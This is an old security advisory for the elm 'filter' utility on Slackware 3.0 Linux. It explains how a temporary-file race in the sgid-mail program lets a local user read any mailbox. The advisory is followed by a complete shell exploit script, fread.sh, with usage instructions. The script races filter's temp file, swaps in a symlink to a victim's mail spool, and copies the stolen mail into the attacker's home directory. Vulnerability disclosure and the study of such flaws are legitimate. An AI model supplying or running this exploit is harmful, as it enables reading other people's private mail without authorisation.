COMMAND

    filter, an elm utility

SYSTEMS AFFECTED

    linux - Slackware 3.0, others with sgid mail filter

PROBLEM

    The elm filter  under linux runs  sugrp mail, thus  allowing it to
    freely read and write from users mail spools.  It is only  through
    the  integrity  of  its  code  that  the  security of linux's mail
    system is  protected; and  in this  respect it  falls short.   The
    failure of the filter  program to properly handle  temporary files
    allows  a  user  to  read  or  write  to  any user's mail spool, a
    significant security hole.

    The specific  problem that  is exploited  in this  hole is the way
    filter uses a temporary  file to store the  input to it, and  then
    subsequently send it  back out according  to the filter.   Because
    of  the  modularity  of  the  coding,  in  the  main filter.c, the
    temporary file is opened, and  then written to; after which  it is
    closed.   The  mailmessage  function  is  then  called,  with  the
    purpose of forwarding  that mail, written  to the temporary  file,
    to whatever destination is specified in the filter.  At the  start
    of this process,  the temporary file  is opened, and  the contents
    of it are dumped to the mail  spool of the user the mail is  being
    forwarded to.

    At  any  point  after  the  file  has been initially opened by the
    main  filter  function,   since  the  user   running  filter   has
    permissions on  that temp  file, it  can be  rm'd.   The temp file
    existing can  then be  replaced with  a symbolic  link to any file
    that group mail  has read permissions  on.  When  it is opened  in
    the  mailmessage  function,  the  symbolic  link  is  followed and
    whatever  file  that  was  pointed  to  will  be  read in, and the
    contents forwarded to the user specified in the mail spool.

------------------------------------------------------------------------------
#!/bin/sh
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#

cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp

cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit

_EOF_

echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp
/tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail
------------------------------------------------------------------------------